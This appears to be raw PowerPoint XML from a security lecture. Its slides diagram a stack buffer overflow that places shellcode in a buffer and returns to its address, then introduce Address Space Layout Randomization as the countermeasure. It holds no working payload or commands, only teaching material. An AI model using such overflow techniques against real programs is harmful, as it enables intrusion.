                <a:r>
                  <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
                  <a:t>ebp</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="46" name="TextBox 45"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6434415" y="1754783"/>
                <a:ext cx="1600493" cy="3436564"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="6350" cmpd="sng">
                <a:prstDash val="lgDash"/>
              </a:ln>
            </p:spPr>
            <p:style>
              <a:lnRef idx="2">
                <a:schemeClr val="dk1"/>
              </a:lnRef>
              <a:fillRef idx="1">
                <a:schemeClr val="lt1"/>
              </a:fillRef>
              <a:effectRef idx="0">
                <a:schemeClr val="dk1"/>
              </a:effectRef>
              <a:fontRef idx="minor">
                <a:schemeClr val="dk1"/>
              </a:fontRef>
            </p:style>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
                  <a:t>buf</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="16406" name="TextBox 46"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm rot="16200000">
                <a:off x="6183345" y="3617513"/>
                <a:ext cx="219267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4000" dirty="0" err="1">
                    <a:latin typeface="Calibri"/>
                  </a:rPr>
                  <a:t>Shellcode</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="4000" dirty="0">
                  <a:latin typeface="Calibri"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="16407" name="TextBox 47"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7973829" y="4843453"/>
                <a:ext cx="11217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latin typeface="Calibri"/>
                  </a:rPr>
                  <a:t>0xffffe3f8</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="16408" name="TextBox 48"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7988949" y="1696796"/>
                <a:ext cx="1137058" cy="369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latin typeface="Calibri"/>
                  </a:rPr>
                  <a:t>0xffffe428</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="Freeform 7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8074602" y="1027787"/>
                <a:ext cx="876460" cy="5169926"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 30241 w 500608"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 5593739"/>
                  <a:gd name="connsiteX1" fmla="*/ 438489 w 500608"/>
                  <a:gd name="connsiteY1" fmla="*/ 1602530 h 5593739"/>
                  <a:gd name="connsiteX2" fmla="*/ 453609 w 500608"/>
                  <a:gd name="connsiteY2" fmla="*/ 4762237 h 5593739"/>
                  <a:gd name="connsiteX3" fmla="*/ 0 w 500608"/>
                  <a:gd name="connsiteY3" fmla="*/ 5593739 h 5593739"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX0" y="connsiteY0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX1" y="connsiteY1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX2" y="connsiteY2"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX3" y="connsiteY3"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="500608" h="5593739">
                    <a:moveTo>
                      <a:pt x="30241" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="199084" y="404412"/>
                      <a:pt x="367928" y="808824"/>
                      <a:pt x="438489" y="1602530"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="509050" y="2396236"/>
                      <a:pt x="526690" y="4097036"/>
                      <a:pt x="453609" y="4762237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="380528" y="5427438"/>
                      <a:pt x="0" y="5593739"/>
                      <a:pt x="0" y="5593739"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:ln w="38100" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="8E2800"/>
                </a:solidFill>
                <a:prstDash val="dash"/>
                <a:headEnd type="none"/>
                <a:tailEnd type="arrow"/>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16410" name="TextBox 53"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7912648" y="6172831"/>
                <a:ext cx="11859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latin typeface="Calibri"/>
                  </a:rPr>
                  <a:t>0xffffd5d8</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="608013"/>
            <a:ext cx="1600200" cy="793750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="6350" cmpd="sng">
            <a:prstDash val="lgDash"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>buf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(0xffffd5d8)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="608013"/>
            <a:ext cx="1600200" cy="53213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 name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="1401763"/>
            <a:ext cx="1600200" cy="354012"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="6350" cmpd="sng">
            <a:prstDash val="lgDash"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>caller’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="1755775"/>
            <a:ext cx="1600200" cy="3435350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="6350" cmpd="sng">
            <a:prstDash val="lgDash"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>buf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16390" name="TextBox 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="90488" y="4864100"/>
            <a:ext cx="755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err="1">
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>[0]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Straight Arrow Connector 22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="769938" y="1874838"/>
            <a:ext cx="258762" cy="0"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="16392" name="TextBox 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-44450" y="1674813"/>
            <a:ext cx="873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err="1">
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>[63]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16393" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="778669" y="3617119"/>
            <a:ext cx="21923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4000" dirty="0" err="1">
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16394" name="TextBox 30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2568575" y="4843463"/>
            <a:ext cx="1185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latin typeface="Calibri"/>
              </a:rPr>
              <a:t>0xffffd5d8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17453" name="Rounded Rectangular Callout 17452"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="317500"/>
            <a:ext cx="3108324" cy="1247775"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 5045"/>
              <a:gd name="adj2" fmla="val 115821"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="38100" cmpd="sng">
            <a:no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schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Address Space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Layout Randomization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Straight Arrow Connector 24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="769938" y="5067300"/>
            <a:ext cx="258762" cy="0"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="16397" name="TextBox 27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2584450" y="1697038"/>
            <a:ext cx="11858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latin typeface="Calibri"/>
              </a:rPr>
              <a:t>0xffffd618</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6538569" y="6019800"/>
            <a:ext cx="1233831" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Oops…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25106814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nodeType="with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74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53" grpId="0" animBg="1"/>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smtClean="0"/>
              <a:t>ASLR</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17410" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Traditional exploits need precise addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>tack-based overflows:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> location of shell code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>return-to-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> library addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Problem: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>program’s memory layout is fixed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>stack, heap, libraries etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Solution: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>randomize addresses of each region!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1891786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dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>unning </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> Twice</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Run 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Run 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="780256" y="1981200"/>
            <a:ext cx="7583488" cy="1289050"/>
            <a:chOff x="955675" y="1966913"/>
            <a:chExt cx="7583488" cy="1289050"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="19458" name="Picture 11" descr="Screen shot 2010-02-28 at 4.26.59 P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5675" y="1966913"/>
              <a:ext cx="7583488"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966788" y="2146300"/>
              <a:ext cx="1779587" cy="1089025"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF00">
                <a:alpha val="30000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="25400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>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solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="780257" y="4343400"/>
            <a:ext cx="7583487" cy="1292225"/>
            <a:chOff x="944563" y="4341813"/>
            <a:chExt cx="7583487" cy="1292225"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="19459" name="Picture 12" descr="Screen shot 2010-02-28 at 4.27.11 P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44563" y="4341813"/>
              <a:ext cx="7583487"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955675" y="4532313"/>
              <a:ext cx="1779588" cy="1090612"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF00">
                <a:alpha val="30000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="25400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>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solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="555734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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="815975" y="2827338"/>
            <a:ext cx="2495550" cy="3205162"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E47932"/>
          </a:solidFill>
          <a:ln w="28575" cmpd="sng">
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Program</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
